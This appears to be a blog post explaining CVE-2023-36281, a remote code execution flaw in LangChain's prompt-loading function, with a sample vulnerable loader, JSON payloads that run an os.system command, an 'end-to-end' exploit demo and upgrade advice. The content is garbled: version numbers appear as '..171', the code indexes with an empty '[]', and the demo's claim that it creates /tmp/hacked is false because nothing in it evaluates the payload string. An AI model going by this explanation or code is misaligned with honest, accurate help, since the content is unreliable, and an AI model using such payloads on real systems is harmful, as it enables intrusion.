LangChain is a popular open-source framework for developing applications powered by large language models (LLMs). But, in June 2023, a critical vulnerability – CVE-2023-36281 – was discovered in version ..171 that allows remote attackers to execute arbitrary code just by loading a crafted JSON file with the load_prompt method.

This post breaks down this vulnerability in simple terms, provides example code, and explains how attackers can exploit it.

What is the Vulnerability?

LangChain's load_prompt function is designed to help developers import prompt templates from files (including JSON). In the affected version, this function uses unsafe methods like Python’s __subclasses__ and eval to reconstruct objects based only on the data in the JSON file.

If an attacker can send a JSON file with specially crafted content, LangChain may trust that JSON and execute arbitrary code on your server. This flaw springs from deserialization attacks, a common bug class where "loading" data can become "running code" if the system is careless.

Let’s look at a simplified version of what might happen inside load_prompt

import json

def load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    # DANGER: Dynamically selecting classes and instantiating them
    clazz = [cls for cls in object.__subclasses__() if cls.__name__ == config["class"]][]
    return clazz(**config["kwargs"])

The object.__subclasses__() call retrieves all subclasses of Python's base object class — including dangerous ones like os._wrap_close, which could potentially be abused for code execution. An attacker can specify class and kwargs in the JSON so that the application ends up executing attacker-supplied code.

NOTE: This is a simplified example, but it captures the core issue.

The attacker crafts a JSON file like this

{
  "class": "warning",
  "kwargs": {
    "message": "__import__('os').system('touch /tmp/pwned')",
    "category": "UserWarning"
  }
}

If the application uses eval or similar techniques to "reconstruct" objects from this JSON, the malicious payload __import__('os').system('touch /tmp/pwned') will execute on the server when this file is loaded.

Here’s an end-to-end Python demo showing how the vulnerability can be abused

import json

# Malicious JSON payload
malicious_json = '''
{
  "class": "catch_warnings",
  "kwargs": {
    "record": false,
    "module": "__import__('os').system('touch /tmp/hacked')"
  }
}
'''

with open("malicious_prompt.json", "w") as f:
    f.write(malicious_json)

# Function as in older langchain version
def vulnerable_load_prompt(path):
    with open(path, "r") as f:
        config = json.load(f)
    cls = [c for c in object.__subclasses__() if c.__name__ == config["class"]][]
    # Insecure: Passing raw kwargs
    return cls(**config["kwargs"])

# This will execute arbitrary system command from the attacker
vulnerable_load_prompt("malicious_prompt.json")

Running this code will create a file /tmp/hacked on the system, proving the attack worked and arbitrary code was run.

References

- GitHub Advisory: GHSA-2jgw-mphw-4rg9
- MITRE CVE Database: CVE-2023-36281
- LangChain changelog with fix (v..172)

Who’s At Risk?

- Anyone running LangChain ≤ ..171 and letting users upload, supply, or modify prompt configs (JSON or YAML).

Upgrade Immediately: Update to LangChain v..172 or later. Upgrading patches this bug.

2. Never Trust User Templates: Even in new versions, don’t load arbitrary templates from unknown users.
3. Audit Custom Loading Code: If you have custom prompt loading logic, make sure you don’t use __subclasses__, eval, or similar dynamic features on user data!
4. Deploy AppArmor, Seccomp, etc.: Add defense-in-depth by restricting what your Python process can do.

Final Words

CVE-2023-36281 is a textbook example of why you should never blindly load or reconstruct Python objects from user data — especially when using features like __subclasses__ and eval.

If you use LangChain in production, immediately upgrade and audit your templates. For further reading, check the original GitHub advisory.

Timeline

Published on: 08/22/2023 19:16:36 UTC
Last modified on: 11/17/2023 19:15:08 UTC